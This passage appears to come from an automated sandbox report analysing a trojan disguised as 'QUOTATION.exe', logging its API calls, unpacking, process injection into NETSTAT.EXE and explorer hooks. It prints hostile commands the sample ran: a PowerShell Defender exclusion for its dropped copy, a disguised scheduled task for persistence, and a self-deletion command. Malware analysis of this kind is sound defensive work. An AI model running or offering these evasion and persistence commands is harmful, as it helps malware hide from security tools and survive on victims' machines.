          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289820 NtEnumerateKey,24_2_03289820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328B040 NtSuspendThread,24_2_0328B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032898A0 NtWriteVirtualMemory,24_2_032898A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032898F0 NtReadVirtualMemory,24_2_032898F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289730 NtQueryVirtualMemory,24_2_03289730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328A710 NtOpenProcessToken,24_2_0328A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289760 NtOpenProcess,24_2_03289760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328A770 NtOpenThread,24_2_0328A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289770 NtSetInformationFile,24_2_03289770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032897A0 NtUnmapViewOfSection,24_2_032897A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289610 NtEnumerateValueKey,24_2_03289610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289670 NtQueryInformationProcess,24_2_03289670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289520 NtWaitForSingleObject,24_2_03289520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328AD30 NtSetContextThread,24_2_0328AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289560 NtWriteFile,24_2_03289560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032895F0 NtQueryInformationFile,24_2_032895F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A360 NtCreateFile,24_2_0074A360
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A410 NtReadFile,24_2_0074A410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A490 NtClose,24_2_0074A490
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A540 NtAllocateVirtualMemory,24_2_0074A540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A35B NtCreateFile,24_2_0074A35B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A40A NtReadFile,24_2_0074A40A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A48A NtClose,24_2_0074A48A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A53C NtAllocateVirtualMemory,24_2_0074A53C
          Source: QUOTATION.exe, 00000001.00000002.297891578.000000000040A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
          Source: QUOTATION.exe, 00000001.00000002.302035905.00000000059B0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
          Source: QUOTATION.exe, 00000001.00000003.287892144.00000000037E4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs QUOTATION.exe
          Source: QUOTATION.exe, 0000000D.00000000.290403933.00000000003DA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
          Source: QUOTATION.exe, 00000011.00000002.378944407.000000000125F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000011.00000000.296533989.00000000005CA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
          Source: QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs QUOTATION.exe
          Source: QUOTATION.exeBinary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
          Source: QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: lQdAGavApIJoo.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: QUOTATION.exeVirustotal: Detection: 40%
          Source: QUOTATION.exeReversingLabs: Detection: 18%
          Source: C:\Users\user\Desktop\QUOTATION.exeFile read: C:\Users\user\Desktop\QUOTATION.exeJump to behavior
          Source: QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION.exe "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmpJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXEJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8E88.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@17/8@2/1
          Source: C:\Users\user\Desktop\QUOTATION.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QUOTATION.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: netstat.pdb source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: QUOTATION.exe, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: lQdAGavApIJoo.exe.1.dr, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.3.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.2.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.2.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.1.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.2.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.3.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.5.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.2.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.7.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.9.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_0036424F push es; iretd 1_2_0036425C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_003642B1 push cs; iretd 1_2_003642CC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00364287 push cs; iretd 1_2_003642B0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_003642DB push ss; iretd 1_2_003642F6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00DAE768 pushfd ; ret 1_2_00DAE769
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_0033424F push es; iretd 13_2_0033425C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_003342B1 push cs; iretd 13_2_003342CC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_00334287 push cs; iretd 13_2_003342B0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_003342DB push ss; iretd 13_2_003342F6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00417015 push esp; retf 17_2_00417041
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041690B push cs; ret 17_2_0041690E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D4B5 push eax; ret 17_2_0041D508
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D56C push eax; ret 17_2_0041D572
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D502 push eax; ret 17_2_0041D508
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D50B push eax; ret 17_2_0041D572
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0052424F push es; iretd 17_2_0052425C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_005242DB push ss; iretd 17_2_005242F6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00524287 push cs; iretd 17_2_005242B0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_005242B1 push cs; iretd 17_2_005242CC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0102D0D1 push ecx; ret 17_2_0102D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0329D0D1 push ecx; ret 24_2_0329D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00747015 push esp; retf 24_2_00747041
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074690B push cs; ret 24_2_0074690E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074DC11 push gs; ret 24_2_0074DC13
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074D4B5 push eax; ret 24_2_0074D508
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074D56C push eax; ret 24_2_0074D572
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074D502 push eax; ret 24_2_0074D508
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074D50B push eax; ret 24_2_0074D572
          Source: initial sampleStatic PE information: section name: .text entropy: 7.84988973797
          Source: initial sampleStatic PE information: section name: .text entropy: 7.84988973797
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE1
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del "C:\Users\user\Desktop\QUOTATION.exe"Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
